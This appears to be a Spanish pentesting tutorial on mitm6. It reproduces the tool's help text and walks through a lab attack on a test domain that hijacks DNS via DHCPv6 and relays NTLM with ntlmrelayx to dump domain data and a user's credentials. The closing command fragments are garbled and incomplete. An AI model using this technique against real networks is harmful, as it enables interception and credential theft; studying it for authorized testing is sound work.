Sobre la herramienta:
mitm6 es una herramienta de pentesting que explota la configuración predeterminada de Windows para hacerse cargo del servidor DNS predeterminado. Lo hace respondiendo a los mensajes de DHCPv6, proporcionando a las víctimas una dirección IPv6 de enlace local y configurando el host de los atacantes como servidor DNS predeterminado. Como servidor DNS, mitm6 responderá selectivamente a las consultas DNS de los atacantes que eligen y redirigirá el tráfico de las víctimas a la máquina atacante en lugar del servidor legítimo. Mitm6 está diseñado para funcionar junto con ntlmrelayx de impacket para la suplantación de identidad de WPAD y la transmisión de credenciales.
Uso:
usage: mitm6 [-h] [-i INTERFACE] [-l LOCALDOMAIN] [-4 ADDRESS] [-6 ADDRESS] [-m ADDRESS] [-a] [-r TARGET] [-v] [--debug]
[-d DOMAIN] [-b DOMAIN] [-hw DOMAIN] [-hb DOMAIN] [--ignore-nofqdn]
mitm6 - pwning IPv4 via IPv6
For help or reporting issues, visit https://github.com/dirkjanm/mitm6
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Interface to use (default: autodetect)
-l LOCALDOMAIN, --localdomain LOCALDOMAIN
Domain name to use as DNS search domain (default: use first DNS domain)
-4 ADDRESS, --ipv4 ADDRESS
IPv4 address to send packets from (default: autodetect)
-6 ADDRESS, --ipv6 ADDRESS
IPv6 link-local address to send packets from (default: autodetect)
-m ADDRESS, --mac ADDRESS
Custom mac address - probably breaks stuff (default: mac of selected interface)
-a, --no-ra Do not advertise ourselves (useful for networks which detect rogue Router Advertisements)
-r TARGET, --relay TARGET
Authentication relay target, will be used as fake DNS server hostname to trigger Kerberos auth
-v, --verbose Show verbose information
--debug Show debug information
Filtering options:
-d DOMAIN, --domain DOMAIN
Domain name to filter DNS queries on (Allowlist principle, multiple can be specified.)
-b DOMAIN, --blocklist DOMAIN, --blacklist DOMAIN
Domain name to filter DNS queries on (Blocklist principle, multiple can be specified.)
-hw DOMAIN, -ha DOMAIN, --host-allowlist DOMAIN, --host-whitelist DOMAIN
Hostname (FQDN) to filter DHCPv6 queries on (Allowlist principle, multiple can be specified.)
-hb DOMAIN, --host-blocklist DOMAIN, --host-blacklist DOMAIN
Hostname (FQDN) to filter DHCPv6 queries on (Blocklist principle, multiple can be specified.)
--ignore-nofqdn Ignore DHCPv6 queries that do not contain the Fully Qualified Domain Name (FQDN) option.
Ejemplo práctico:
En primer lugar, instalamos mitm6 clonando el repositorio con el siguiente comando:
❯ git clone https://github.com/dirkjanm/mitm6.git
Para proceder a su instalación ejecutaremos el comando:
❯ pip3 install .
Ejecutamos mitm6 en nuestro caso hacia el dominio laughtale.local
Al mismo tiempo ejecutaremos impacket-ntlmrelayx con las opciones
Reiniciamos el equipo en cuestión.
Y empezará a cargar la información.
Al cabo de un rato nos indicará que se ha realizado el volcado de la información en el directorio al que dimos nombre anteriormente. Si hacemos un listado de nuestro directorio info, podremos ver el volcado.
Nos posicionamos sobre el directorio en cuestión y abrimos el archivo
Como podemos ver a continuación hemos podido sacar de una manera sencilla información sensible del dominio, hemos podido volcar las credenciales que tenía uno de los usuarios en el apartado descripción.
❯ mitm6 -d < nombre de dominio >
-6
(ipv6) -t
target -wh
WPAD host -l
loot directorio de volcado.❯ mitm6 -d < nombre_dominio >
.html
con el navegador para una mejor visualización.